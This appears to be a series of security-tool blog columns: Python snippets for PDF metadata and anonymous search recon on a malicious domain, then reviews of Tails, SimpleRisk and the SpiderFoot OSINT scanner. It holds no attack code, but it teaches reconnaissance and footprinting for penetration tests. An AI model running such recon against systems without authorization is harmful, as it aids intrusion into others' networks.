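For the curious, the core of the PyPDF approach is only a few lines. Here’s a minimal sketch (mine, not TJ’s exact pdfRead.py) that pulls the document information dictionary from a PDF:

# pdf_meta_sketch.py: a minimal sketch of the PyPDF metadata approach (not TJ's exact code)
from pyPdf import PdfFileReader

pdf_file = open('suspect.pdf', 'rb')
doc_info = PdfFileReader(pdf_file).getDocumentInfo()
for meta_item in doc_info:
    # keys look like /Author, /Creator, /Producer, /CreationDate
    print '[+] ' + meta_item + ': ' + str(doc_info[meta_item])
pdf_file.close()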
The author reference is a standout for you; from a workstation with a browser you search “Zeon Technical Publications” and find reference to it on VirusTotal and JSunpack; these results, along with a quick MD5sum hash match, indicate that this PDF is clearly malicious. The JSunpack reference indicates that shellcode phones home to www.ax19.cn (see Figure 3), a domain about which you’d now like to learn more.

Figure 3: JSunpack confirms an evil PDF
You could have sought anonymity to conduct the above-mentioned search, which leads us to the third pillar of our security analytics lifecycle. This third phase includes web recon as discussed in Chapter 6 of Violent Python, a common step in the attack and penetration testing discipline, to see what more we can learn about this malicious domain. As we often seek anonymity during the recon phase, Violent Python allows you to maintain a bit of stealth by leveraging the deprecated Google API against which a few queries a day can still be executed. The newer API requires a developer’s key, which one can easily argue is not anonymous. Executing python anonGoogle.py -k 'www.ax19.cn' will return yet another validating result as seen in Figure 4.

Figure 4: anonGoogle matches ax19.cn to malicious activity
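Under the hood, this is little more than a JSON fetch. A minimal sketch of the idea (again, mine rather than TJ’s exact anonGoogle.py) against the old AJAX search endpoint looks like this:

# anon_google_sketch.py: the gist of querying the long-deprecated Google AJAX Search API
# (no developer key required; mine, not TJ's exact code)
import json
import urllib
import urllib2

def google(search_term):
    url = ('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q='
           + urllib.quote_plus(search_term))
    results = json.load(urllib2.urlopen(url))
    for hit in results['responseData']['results']:
        print '[+] ' + hit['titleNoFormatting']
        print '    ' + hit['url']

google('www.ax19.cn')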
With seven rich chapters of Python goodness, TJ’s Violent Python represents a golden opportunity to expand your security analytics horizons. There is much to learn here while accentuating your use of Python in your information security practice.

In Conclusion

I’m hopeful this slightly different approach to toolsmith was useful for you this month. I’m looking to shake things up a bit here in 2013 and am certainly open to suggestions you may have regarding ideas and approaches to doing so. Violent Python was a great read for me and a pleasure to put to use, both for this article as well as in my personal tool box. I’m certain you’ll find this book equally useful.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

TJ O’Connor, Violent Python author
Mila Parkour, Contagio

Follow up on C3CM: Pt 2 – Bro with Logstash & Kibana (read Applied NSM)

In September I covered using Bro with Logstash and Kibana as part of my C3CM (identify, interrupt, and counter the command, control, and communications capabilities of our digital assailants) series in toolsmith. Two very cool developments have since taken place that justify follow-up:

1) In November Jason Smith (@automayt) posted Parsing Bro 2.2 Logs with Logstash on the Applied Network Security Monitoring blog. This post exemplifies exactly how to configure Bro with Logstash and Kibana, and includes reference material regarding how to do so with Doug Burks' (@dougburks) Security Onion (@securityonion).

2) Additionally, please join me in congratulating Chris Sanders (@chrissanders88), lead author, along with contributing authors Jason Smith, David Bianco (@DavidJBianco), and Liam Randall (@hectaman), on the very recent publication of the book the Applied NSM blog supports: Applied Network Security Monitoring: Collection, Detection, and Analysis, also available directly from Syngress.

Chris is indeed a packet ninja, a fellow GSE, and quite honestly a direct contributor to how I passed that extremely challenging certification. His Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems is an excellent book and was a significant part of my study and practice for the GSE process. As such, while I have not yet read it, I am quite confident that Applied Network Security Monitoring: Collection, Detection, and Analysis will be of great benefit to all who purchase and read it. Let me be more clear, at the risk of coming off as an utter fanboy: I read Chris' Practical Packet Analysis as part of my studies for GSE | passed GSE as part of STI graduate school requirements | finished graduate school. :-)
Congratulations, Chris and team, well done, and thank you.

Merry Christmas all, and cheers.

toolsmith: Tails - The Amnesiac Incognito Live System


Privacy for anyone anywhere



Prerequisites/dependencies
Systems that can boot DVD, USB, or SD media (x86, no PowerPC or ARM), 1GB RAM

Introduction
“We will open the book. Its pages are blank. We are going to put words on them ourselves. The book is called Opportunity and its first chapter is New Year's Day.”  -Edith Lovejoy Pierce

First and foremost, Happy New Year!
If you haven’t read or heard about the perpetual stream of rather incredible disclosures continuing to emerge regarding the NSA’s activities as revealed by Edward Snowden, you’ve likely been completely untethered from the Matrix or have indeed been hiding under the proverbial rock. As the ISSA Journal focuses on Cyber Security and Compliance for the January 2014 issue, I thought it a great opportunity to weave a few privacy related current events into the discussion while operating under the auspicious umbrella of the Cyber Security label. The most recent article that caught my attention was Reuters reporting that “as a key part of a campaign to embed encryption software that it could crack into widely used computer products, the U.S. National Security Agency arranged a secret $10 million contract with RSA, one of the most influential firms in the computer security industry.” The report indicates that RSA received $10M from the NSA in exchange for utilizing the agency-backed Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC DRBG) as its preferred random number algorithm, an allegation that RSA denies in part.
In September 2013 the New York Times reported that an NSA memo released by Snowden declared that “cryptanalytic capabilities are now coming online…vast amounts of encrypted Internet data which have up till now been discarded are now exploitable." Ars Technica’s Dan Goodin described Operation Bullrun as “a combination of ‘supercomputers, technical trickery, court orders, and behind-the-scenes persuasion’ to undermine basic staples of Internet privacy, including virtual private networks (VPNs) and the widely used secure sockets layer (SSL) and transport layer security (TLS) protocols.” Finally, consider that, again as reported by Dan Goodin, a senior NSA cryptographer, Kevin Igoe, is also the co-chair of the Internet Engineering Task Force’s (IETF) Crypto Forum Research Group (CFRG). What could possibly go wrong? According to Dan, Igoe's leadership had largely gone unnoticed until the above-mentioned reports surfaced in September 2013 exposing the role NSA agents have played in "deliberately weakening the international encryption standards adopted by developers."
I must admit I am conflicted. I believe in protecting the American citizenry above all else. The NSA claims that their surveillance efforts have thwarted attacks against America. Regardless of the debate over the right or wrong of how or if this was achieved, I honor the intent. Yet, while I believe Snowden’s actions are traitorous, as an Internet denizen I can understand his concerns. The problem is that he swore an oath to his country, was well paid to honor it, and then violated it.  Regardless of my take on these events and revelations, my obligation to you is to provide you with tooling options. The Information Systems Security Association (ISSA) is an international organization of information security professionals and practitioners. As such, are there means by which our global readership can better practice Internet privacy and security? While there is no panacea, I propose that the likes of The Amnesiac Incognito Live System, or Tails, might contribute to the cause. Again, per the Tails team themselves: “Even though we're doing our best to offer you good tools to protect your privacy while using a computer, there is no magic or perfect solution to such a complex problem.” That said, Tails endeavors to help you preserve your privacy and anonymity. Tails documentation is fabulous; you would do well to start with a full read before using Tails to protect your privacy for the first time.

Tails
Tails, a merger of the Amnesia and Incognito projects, is a Debian 6 (Squeeze) Linux distribution that works optimally as a live instance via DVD, USB, or SD media. Tails seeks to provide online anonymity and censorship circumvention with the Tor anonymity network to protect your privacy online. All software is configured to connect to the Internet through Tor, and if an application tries to connect to the Internet directly, the connection is automatically blocked for security purposes. At this point the well-informed amongst you are likely uttering a “whiskey tango foxtrot, Russ, in October The Guardian revealed that the NSA targeted the Tor network.” Yes, true that, but it doesn’t mean that you can’t safely use Tor in a manner that protects you. This is a great opportunity, however, to direct you to the Tails warning page. Please read this before you do anything else; it’s important. Schneier’s Guardian article also provides nuance: “The fact that all Tor users look alike on the internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.”
Getting under way with Tails is easy. Download it, burn it to your preferred media, load the media into your preferred system, and boot it up. I prefer using Tails on USB media inclusive of a persistence volume; just remember to format the USB media in a manner that leaves room to create the persistent volume.
When you boot Tails, the first thing you’ll see, as noted in Figure 1, is the Tails Greeter, which offers you More Options. Selecting Yes leads you to the option to set an administrative password (recommended) as well as Windows XP Camouflage mode (makes Tails look like Windows XP when you may have shoulder surfers).

FIGURE 1: Tails Greeter
You can also boot into a virtual machine, but there are some specific drawbacks to this method (the host operating system and the virtualization software can monitor what you are doing in Tails). However, Tails will warn you, as seen in Figure 2.

FIGURE 2: Tails warns regarding a VM and confirms Tor
Tor

You’ll also note in Figure 2 that Tor Browser (built on Iceweasel, a Firefox alternative) is already configured to use Tor, including the Torbutton, as well as the NoScript, Cookie Monster, and Adblock Plus add-ons. There is one Tor enhancement to consider that can be added during the boot menu sequence for Tails, where you can interrupt the boot sequence with Tab, hit Space, and then add bridge to enable Tor Bridge Mode. According to the Tor Project, bridge relays (or bridges for short) are Tor relays that aren't listed in the main Tor directory. As such, even if your ISP is filtering connections to all known Tor relays, they probably won't be able to block all bridges. If you suspect access to the Tor network is being blocked, consider use of the Tor bridge feature as supported fully by Tails when booting in bridge mode. Control Tor with Vidalia, which is available via the onion icon in the notification area found in the upper right of the Tails UI.
One last note on Tor use, as already described on the Tails warning page you should have read by now: your Tor use is only as good as your exit node. Remember, “Tor is about hiding your location, not about encrypting your communication.” Tor does not, and cannot, encrypt the traffic between an exit node and the destination server. Therefore, any Tor exit node is in a position to capture any traffic passing through it, and you should thus use end-to-end encryption for all communications. Be aware that Tails also offers I2P as an alternative to Tor.

Encryption Options and Features

HTTPS Everywhere is already configured for you in Tor Browser. HTTPS Everywhere uses rulesets of regular expressions to rewrite URLs to HTTPS. Certain sites offer limited or partial support for encryption over HTTPS but make it difficult to use, where they may default to unencrypted HTTP or provide hyperlinks on encrypted pages that point back to the unencrypted site.
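Conceptually, each rule is just a regular expression rewrite. A toy illustration of the idea in Python follows; the hostname is a placeholder, and actual HTTPS Everywhere rules ship as XML ruleset files with the extension:

# Illustrative only: a regex rewrite of the sort HTTPS Everywhere rulesets perform.
import re

rule_from = r'^http://(www\.)?example\.com/'
rule_to = 'https://www.example.com/'

for url in ('http://example.com/login', 'http://www.example.com/cart'):
    # both URLs now point at the encrypted https://www.example.com/ site
    print re.sub(rule_from, rule_to, url)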

You can use Pidgin for instant messaging which includes OTR or off-the-record encryption. Each time you start Tails you can count on it to generate a random username for all Pidgin accounts.

If you’re afraid the computer you’ve booted Tails on (a system in an Internet café or library) is not trustworthy due to the likes of a hardware keylogger, you can use the Florence virtual keyboard, also found in the notification area, as seen in Figure 3.

FIGURE 3: The Tails virtual keyboard
If you’re going to create a persistent volume (recommended) when you use Tails from USB media, do so easily with Applications | Tails | Configure persistent volume. Reboot, then be sure to enable persistence with the Tails Greeter. Remember, you will need to set up the USB stick to leave unused space for a persistent volume.
You can securely wipe files and clean up available space thereafter with Nautilus Wipe. Just right-click a file or files in the Nautilus file manager and select Wipe to blow it away…forever…in perpetuity.
KeePassX is available to securely manage passwords and store them on your persistent volume. You can also configure all your keyrings (GPG, Gnome, Pidgin) as well as Claws Mail. Remember, the persistent volume is encrypted upon creation.
You can encrypt text with a passphrase, encrypt and sign text with a public key, and decrypt and verify text with the Tails gpgApplet (the clipboard icon in the notification area).

One last cool Tails feature that doesn’t garner much attention is the Metadata Anonymisation app. This is not unlike OOMetaExtractor from Informatica 64, the same folks who bring you FOCA as described in the March 2011 toolsmith. Metadata Anonymisation is found under Applications, then Accessories. This application will strip all of those interesting file properties left in metadata, such as author names and dates of creation or change. I have used my share of metadata to create target lists for social engineering during penetration tests, so it’s definitely a good idea to clean docs before you publish or share them if you wish to remain anonymous. Figure 4 shows a before and after collage of PowerPoint metadata for a recent presentation I gave.
FIGURE 4: Metadata cleanup with Tails
There are numerous opportunities to protect yourself using The Amnesiac Incognito Live System, and I strongly advocate keeping an instance at the ready should you need it. It’s ideal for those of you who travel to hostile computing environments, as well as for those non-US readers who may not benefit from the same level of personal freedoms and protection from censorship that we typically enjoy here in the States (tongue somewhat in cheek given current events described herein).

Conclusion

Aside from hoping you’ll give Tails a good look and make use of it, I’d like to leave you with two related resources well worth your attention. The first is a 2007 presentation from Dan Shumow and Niels Ferguson of Microsoft titled On the Possibility of a Back Door in the NIST SP800-90 Dual Ec Prng. Yep, the same random number generator as described in the introduction to this column. The second resource is from bettercrypto.org and is called Applied Crypto Hardening. Systems administrators should definitely give this one a read.
Enjoy your efforts to shield yourself from watchful eyes and ears and let me know what you think of Tails. Ping me on Twitter (@holisticinfosec) or via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

2013 Toolsmith Tool of the Year: Recon-ng

Congratulations to Tim Tomes of Black Hills Information Security.
@LaNMaSteR53's Recon-ng is the 2013 Toolsmith Tool of the Year.
We had quite the turnout this year, with 881 total votes.
Recon-ng finished first with 44% of the vote, in a very tight race with ProcDOT which came in second with 40%, and all others pulling up the rear.
Tim will receive a book of his choosing or a donation to his preferred charity. 


Congratulations and thank you to all of this year's participants. 2014 should bring us another great year of tools for information security practitioners. Please feel free to submit your favorites for consideration.

toolsmith: SimpleRisk - Enterprise Risk Management Simplified



Prerequisites/dependencies
LAMP/XAMPP server

Introduction
Our editorial theme for February’s ISSA Journal happens to be Risk, Threats, and Vulnerabilities, which means that Josh Sokol’s SimpleRisk as our toolsmith topic is bona fide kismet. I am a major advocate for simplicity and, as the occasional practitioner of simpleton arts, SimpleRisk fits my needs perfectly. SimpleRisk is a free and open source web application, released under Mozilla Public License 2.0, and is extremely useful in performing risk management activities. In my new role at Microsoft, I’m building, with a fine team of engineers, a Threat Intelligence and Engineering practice. This effort is intended to be much more robust than what you may currently understand to be Threat Intelligence. Limiting such activity to monitoring threat feeds, deriving indicators of compromise, and reporting out findings is insufficient to cover the vast realm of risk, threats, and vulnerabilities. As such, we include constant threat assessments of our infrastructure and services in a manner that includes risk analysis and threat modeling, based on SDL principles and the infrastructure threat modeling guidance I wrote some years ago. Keeping in mind that threat modeling can be software-centric, asset-centric, and attacker-centric, recognize that the amount of data you generate can be overwhelming. In addition to embracing the principles of good data science, we’ve also expanded our tooling to include the likes of SimpleRisk. I asked Josh to provide us with insight on SimpleRisk in his own words:
As security professionals, almost every action we take comes down to making a risk-based decision.  Web application vulnerabilities, malware infections, physical vulnerabilities, and much more all boil down to some combination of the likelihood of an event happening and the impact of that event.  Risk management is a relatively simple concept to grasp, but the place where many practitioners fall down is in the tool set.  The lucky security professionals work for companies who can afford expensive GRC tools to aide in managing risk.  The unlucky majority out there usually end up spending countless hours managing risk via spreadsheets.  It's cumbersome, time consuming, and just plain sucks.  After starting a Risk Management program from scratch at a $1B a year company, I ran into these same barriers, and when budget wouldn't allow me the GRC route, I finally decided to do something about it.  At Black Hat and BSides Las Vegas 2013, I formally debuted SimpleRisk. A SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews.  It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly.  It is under active development with new features being added all the time and can be downloaded at http://www.simplerisk.org.  SimpleRisk is truly Enterprise Risk Management simplified.
I can tell you with certainty that a combination of tactics, techniques, and procedures inclusive of threat modeling and analysis, good data science (read The Field Guide to Data Science), and risk management with the likes of SimpleRisk, will lead to an improved security posture. I’ll walk you through a recreation of various real world scenarios and current events using SimpleRisk after some quick installation pointers.

Quick installation notes

I run SimpleRisk on an Ubuntu 13.10 virtual machine configured with a full LAMP stack. Without question you should read the SimpleRisk LAMP Installation Guide, but I’ll give you a quick overview of my installation steps, establishing SimpleRisk as the primary application in the Apache web root:
1)      cd /var/www
2)      Download the latest installation bundle, currently (subject to change): sudo wget http://simplerisk.googlecode.com/files/simplerisk-20131231-001.tgz
3)      sudo tar zxvf simplerisk-20131231-001.tgz
4)      sudo mv simplerisk/* . (moves all SimpleRisk app files to the web root)
5)      sudo rm simplerisk-20131231-001.tgz (removes the installation bundle)
6)      sudo rmdir simplerisk (removes the now empty simplerisk directory)
7)      cd ~
8)      Download the SimpleRisk database import: wget http://simplerisk.googlecode.com/files/simplerisk-20131231-001.sql
9)      mysql -u root -p
10)   create database simplerisk;
11)   use simplerisk;
12)   source ~/simplerisk-20131231-001.sql (populates the SimpleRisk database)
13)   GRANT SELECT, INSERT, UPDATE, DELETE ON simplerisk.* TO 'simplerisk'@'localhost' IDENTIFIED BY 'CHANGEME'; (creates the SimpleRisk database user, change CHANGEME to your preferred password)
14)   exit
15)   sudo gedit /var/www/includes/config.php
16)   Edit line 16 with the database password you set in step 13 (you can also change your timezone in config.php)
17)   Browse to your web server’s root and log in as admin with password admin
18)   Click the Admin button in the upper right of the UI then click My Profile
19)   Change the admin password!

SimpleRisk and the Flintstones

Flintstone, Inc., a prehistoric cave retailer with a strong online presence, has been hacked by the Bedrock Electronic Militia. In one breach, 40 million clams have been stolen, and soon thereafter it is revealed that 70 million additional clams are compromised. Additionally, the attackers have used social engineering to gain access to Flintstone.net social media accounts, including Critter and Cavebook, as well as the Flintstone, Inc. blog. Even the Bedrock news media outlet, Cave News Network, is not immune to Bedrock Electronic Militia’s attacks. Fred and Wilma, the CISO and CEO, are very concerned that their next PCI audit is going to be very difficult given the breach, and they want to use SimpleRisk to track and manage the risks they need to mitigate, as well as the related projects necessary to fulfill the mitigations. The SimpleRisk admin has created two accounts for Fred and Wilma; they’re impressed with the fact that the User Management options under Configure are so granular, specific to User Responsibilities, including the ability to Submit New Risks, Modify Existing Risks, Close Risks, Plan Mitigations, Review Low Risks, Review Medium Risks, Review High Risks, and Allow Access to "Configure" Menu. Fred and Wilma are also quite happy that the SimpleRisk user interface is so…simple. Fred first uses the Configure | Add and Remove Values menu to add Online and Retail Stores as Site/Location values given the variety and location of risks identified. He also adds Identity Management under Team, as well as POS and Proxy under Technology. Fred notes that the Configure menu also offers significant flexibility in establishing risk formula preferences, review (high, medium, low) settings, and the ability to redefine naming conventions for impact, likelihood, and mitigation effort. He and Wilma then immediately proceed to the Risk Management menu to, you guessed it, begin to manage risks exposed during the breach root cause analysis and after-action report. To get started, the Flintstones immediately identify five risks to document:
1)      Account compromise via social engineering
a.       The Flintstone.net Critter and Cavebook accounts were compromised when one of their social media management personnel was spear phished
2)      Inadequate antimalware detection
a.       One of the spear phishing emails included a malicious attachment that was not detected by Dinosoft Security Essentials
3)      Flintstone, Inc. users compromised via watering hole attacks
a.       A lack of egress traffic analysis, detection, and prevention on Flintstone.net corporate networks meant that users were compromised when enticed to visit a known-good website that had been laced with the Blackrock Exploit Kit
4)      Flintstone.com web application vulnerable to cross-site scripting (XSS)  
a.       Attackers can use XSS vulnerabilities to deliver malicious payloads in a more trusted manner given that they execute in the context of the vulnerable site
5)      Flintstone, Inc. Point Of Sale (POS) compromised with Frack POS malware
a.       All POS devices must be scanned with SecureSlate’s Frack POS Malware Scan

As seen in Figure 1, Fred can be very specific in his risk documentation.

FIGURE 1: Fred submits risk for SimpleRisk documentation
As Fred works on the watering hole risk, he decides he’d rather use CVSS risk scoring than classic and is overjoyed to discover that SimpleRisk includes a CVSS calculator, as seen in Figure 2. There is also an OWASP calculator that Fred uses when populating the XSS risk and a DREAD calculator he uses for the POS risk.

FIGURE 2: Fred calculates a CVSS score with SimpleRisk CVSS calculator
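If you’re curious what the calculator is doing under the hood, the CVSS v2 base score reduces to a few lines. Here’s a quick rendition with weights per the CVSS v2 guide; the sample metric values are arbitrary, and SimpleRisk’s own implementation may of course differ:

# cvss2_sketch.py: the CVSS v2 base score equation (illustrative; SimpleRisk's code may differ)
def cvss2_base(C, I, A, AV, AC, Au):
    # C/I/A impact weights: none=0.0, partial=0.275, complete=0.660
    # AV (access vector): local=0.395, adjacent=0.646, network=1.0
    # AC (access complexity): high=0.35, medium=0.61, low=0.71
    # Au (authentication): multiple=0.45, single=0.56, none=0.704
    impact = 10.41 * (1 - (1 - C) * (1 - I) * (1 - A))
    exploitability = 20 * AV * AC * Au
    f_impact = 0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)

# Example: AV:N/AC:M/Au:N/C:P/I:P/A:P scores 6.8
print cvss2_base(0.275, 0.275, 0.275, 1.0, 0.61, 0.704)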
When Fred and Wilma move to the Plan Your Mitigations phase they are a bit taken aback to find that SimpleRisk has stack-ranked the XSS risk as the highest, as seen in Figure 3, but they recognize that risk calculations can be somewhat subjective and that each scoring calculator (CVSS, DREAD, OWASP) derives scores differently. SimpleRisk does include links to references for how each is calculated.

FIGURE 3: SimpleRisk risk ranking allows mitigation prioritization
Fred and Wilma believe that the XSS vulnerability happens to be one they can have mitigated rather quickly and at a low cost, so they choose to focus there first. Clicking No under Mitigation Planned for ID 1004 leads them to the Submit Risk Mitigation page. They submit their planned mitigation as seen in Figure 4.

FIGURE 4: SimpleRisk XSS mitigations submittal
After SimpleRisk accepts the mitigation, Fred and Wilma are sent promptly to the Perform Management Reviews phase, where they choose to review ID 1001 Account compromise via social engineering by clicking No in the related row under the Management Review column. Under Submit Management Review they choose to Approve Risk (versus reject), Consider for Project as the Next Step, and add Deploy two factor authentication under Comments.
Under Prioritize for Project Planning, Fred and Wilma then add a new project called Two Factor Authentication Deployment. They can add other projects and prioritize them later. They also set a schedule to review risks regularly after planning mitigations for, and conducting reviews of, their remaining risks.
As the CISO and CEO of Flintstone, Inc., Fred and Wilma love their executive dashboards. They check the SimpleRisk Risk Dashboard under Reporting, as seen in Figure 5.

FIGURE 5: SimpleRisk Risk Dashboard
They also really appreciate that SimpleRisk maintains an audit trail for all changes and updates made.
Finally, Fred and Wilma decide to take advantage of some SimpleRisk “extras” that cost a bit but are offered under a perpetual license:
·         Custom Authentication Extra: Currently provides support for Active Directory Authentication and Duo Security multi-factor authentication, but will have other custom authentication types in the future.
·         Team Based Separation Extra: Restricts risk viewing to members of the team under which the risk is categorized.
·         Notification Extra: Email notifications when risks are updated or due for action.
·         Encrypted Database Extra: Encryption of sensitive text fields in the database.

In Conclusion

Josh has devised a great platform in SimpleRisk; I’m really glad to have caught mention of it rolling by in my Twitter reads. It fits really nicely in any threat/risk management program. On a related note, as I write this, Adam Shostack’s new book, Threat Modeling: Designing for Security, is nearing its publication date (17 FEB 2014, Wiley). Be sure to grab a copy and incorporate its guidance into your risk, threat, and vulnerability management practice along with the use of SimpleRisk.
Ping me via email (russ at holisticinfosec dot org) if you have questions or suggestions for topics, or hit me on Twitter @holisticinfosec.
Cheers…until next month.

Acknowledgements

Josh Sokol, SimpleRisk developer and project lead

toolsmith: SpiderFoot



Prerequisites/dependencies
Python 2.7 if running on *nix, as well as the M2Crypto, CherryPy, netaddr, dnspython, and Mako modules
Windows version comes as a pre-packaged executable, no dependencies

Introduction
All good penetration tests and threat assessments should be initiated with what you’ve seen referred to in toolsmith as OSINT, or open source intelligence gathering. This practice contributes greatly to collecting a useful list of targets of opportunity. One key element to remember, though: the bad guys are conducting this same activity against you and your Internet-facing assets too. It’s probably best, then, that you develop your own OSINT practice so you can find the information you may not wish to expose, or may not even know you are exposing. Steve Micallef’s SpiderFoot is another tool in the arsenal specific to this cause. You may already be aware that the four phases of a web application security assessment, as defined using the SamuraiWTF distribution, are recon, mapping, discovery, and exploitation. The SANS GIAC Certified Web Application Penetration Tester (GWAPT) curriculum follows suit given that Secure Ideas’ Kevin Johnson contributed heavily (developed) to both. SpiderFoot nicely blends both recon and mapping as part of its feature set. As we consider legal, privacy, and ethics issues for the March ISSA Journal, OSINT and reconnaissance become interesting and related topics. I have, on more than one occasion, discovered data via OSINT tactics that, in the wrong hands, could have been very damaging. When you consider findings of this nature with regard to ethics and legality, you may find yourself in an immediate quandary. Are you obligated to report findings that you know could cause harm to the target if left unmitigated? What if during your analysis you come into possession of classified or proprietary information, the mere possession of which could create legal challenges for you? Imagine findings of this caliber and it becomes easy to recognize why you should always conduct intelligence gathering and footprinting on your own interests before the wrong people do it for you. SpiderFoot, as a tool for just such purposes, allows you to understand “as much as possible about a given target in order to perform a more complete security penetration test.” For large networks, this can be a daunting task; SpiderFoot automates the process significantly, allowing penetration testers to focus their efforts on security testing itself.
Steve provided us with some SpiderFoot history as well as insight on what he finds useful and interesting. He originally wrote SpiderFoot as a C# .NET application in 2005, purely as an exercise to learn C#, having been inspired by BiDiBLAH’s developers from Sensepost (who went on to create Maltego), thinking he could make a lighter open source version. For seven years that was Steve’s first and only release, until he decided to resume development in 2012. His work on next-generation versions has led SpiderFoot to be cross-platform (Python), far more extensible, and more functional, with a much nicer user interface (UI).
Steve’s current challenge with SpiderFoot is deciding what cool functionality to implement next; his to-do list is ever growing and there are numerous features he’d love to extend it to include. He typically balances his time between UI/analysis functionality and new checks to identify more items to aid the penetration tester. The aforementioned OSINT community also continues to produce new sources, which in turn inspire Steve to build new SpiderFoot checks.
He finds it interesting to test out a new module and actually find insightful items out there on the Internet simply during the development process. Steve’s favorite functionality at the moment is identifying owned netblocks and co-hosted sites. Owned Netblocks indicates entire IP ranges that an organization owns, which enables penetration testers to more completely scan the perimeter of a target. Co-hosted Sites shows you any websites on the same server as the target, which can also be revealing. If your target is hosted on the same server as sites identified as being malicious by the malicious site checker or the blacklist checker plug-in, it could potentially indicate that your target is hosted on a compromised server.
As you read this it’s likely that the following planned enhancements are available in SpiderFoot or will be soon:
·         2.1.2 (early March)
o   SOCKS proxy support
o   Real-time scan progress viewer
o   Identify scan quality-impacting issues
o   Autoshun (www.autoshun.org) lookup as part of malicious checks
o   SANS (isc.sans.edu) lookup as part of malicious checks (cue the Austin Powers voice: “Yeah, baby!”)
o   Update GeoIP checker
·         2.1.3 (mid April)
o   VirusTotal, SHODAN, Facebook, Xing, Pastebin and GitHub plug-ins
Note that when you pull SpiderFoot from GitHub, you are downloading a beta version of the next release, as Steve commits new functionality there periodically in preparation for the next version. For instance, SOCKS functionality is in the GitHub repository right now but not in the packaged release version (2.1.1).
SpiderFoot is a great project with a strong development roadmap, so let’s get down to business and explore.

Quick installation notes

Windows installation is an absolute no-brainer: download the package, unpack it, execute sf.exe, and browse to http://127.0.0.1:5001. All dependencies are met, including a standalone Python interpreter, so you may find this option optimal.
Linux (I installed it on SamuraiWTF) users need to settle a few dependencies easily solved with the following few steps that assume pip is already installed:
sudo apt-get install swig
sudo pip install mako cherrypy netaddr M2Crypto dnspython
git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot/
sudo python ./sf.py 0.0.0.0:9999
The last line indicates that you’d like SpiderFoot to bind to all addresses (including localhost) and listen on port 9999. You can define your preferred port or just accept the default (5001) if undefined. Steve reminds us on his installation page to be cautious regarding exposing SpiderFoot to hostile networks (Intranet, security conference wireless) given that there is currently no authentication scheme.

SpiderFoot unleashed

The SpiderFoot UI is, how shall I say, incredibly simple, intuitive, and obvious even. To start a scan…wait for it…select New Scan. Figure 1 represents a scan being kicked off on my domain (don’t do it) as defined by the By Module view.

FIGURE 1: Kicking off a new scan with SpiderFoot
If you wish to more granularly define your scans, select the By Required Data view (default), then pick and choose your preferred data points, including elements such as malicious affiliations, IP data, URL analysis, SSL certificate information, affiliate details, and many other records. You should then be treated to a success message. Scan results are stored in a SQLite DB, so over time you’ll likely build up a collection if you don’t purge. Under the Scans tab, as seen in Figure 2, you can click the scan in the Name column of the table view and review results. You’ll also note status here and can halt the scan if need be. I imagine the real-time scan progress viewer will show itself here in the near future as well.

FIGURE 2: SpiderFoot Scans view
If need be (default settings work quite well), you can tune the actual scan configuration via Settings, with attention to storage, search engines, port scanning, spidering, and TLD searches (see Figure 3), amongst others.

FIGURE 3: SpiderFoot Settings view
When my scan completed, with default settings and all checks enabled, the results included 11,360 elements. For you data miners, metrics minions, and hosting harvesters, you can export the results to CSV (see Figure 4) and filter by findings type and module, or your preferred data pivot.

FIGURE 4: SpiderFoot results and export functionality
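As a quick illustration of that pivot, a few lines of Python will slice the export. Note that the column names here ('Type', 'Module', 'Data') are assumptions on my part; check the header row of your own export, as they may differ by SpiderFoot version:

# csv_filter_sketch.py: filter a SpiderFoot CSV export by event type
# Column names are assumed ('Type', 'Module', 'Data'); verify against your export's header.
import csv

with open('SF-export.csv', 'rb') as f:
    for row in csv.DictReader(f):
        if row.get('Type') == 'CO_HOSTED_SITE':
            print '[+] %s (via %s)' % (row.get('Data'), row.get('Module'))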
As I navigated all the results, I was intrigued to find a hit for URL (Uses Flash), simply because I didn’t recall any Flash features on my site. I immediately chuckled when I reviewed the result, as it was specific to a Flash video I’d created for the 2008 ISSA Northwest Regional Conference wherein I ripped on the now defunct Hacker Safe trustmark for indicating that their customers’ sites were “hacker safe” when, in fact, they were not. Oh, the good old days.
Want to visualize your results? No problem, you can choose from a bubble view of data elements or the discovery path. Figure 5 represents the discovery path for Social Media Presence findings. Hover over each entity for details specific to initial target type, the source module, and the related result.

FIGURE 5: SpiderFoot visualizes a discovery path
SpiderFoot will absolutely uncover nuggets you may have long forgotten about and may want to remove, as they are potentially vulnerable (outdated plugins, modules, etc.) or unnecessarily/unintentionally exposed. I found an old dashboard I’d built by hand eons ago with long-dead external JavaScript calls that had no business still being available. “Be gone!”, I said. That is what SpiderFoot is all about. Add it to the tool collection for penetration tests and OSINT expeditions; you won’t be disappointed.

In Conclusion

Steve Micallef’s SpiderFoot is functionally simple but feature-rich, and it is getting better all the time as it is well built and maintained. Follow @binarypool on Twitter and keep an eye out for timely and regular releases.
Ping me via email (russ at holisticinfosec dot org) if you have questions or suggestions for topics, or hit me on Twitter @holisticinfosec.
Cheers…until next month.

Acknowledgements

Steve Micallef (@binarypool), SpiderFoot author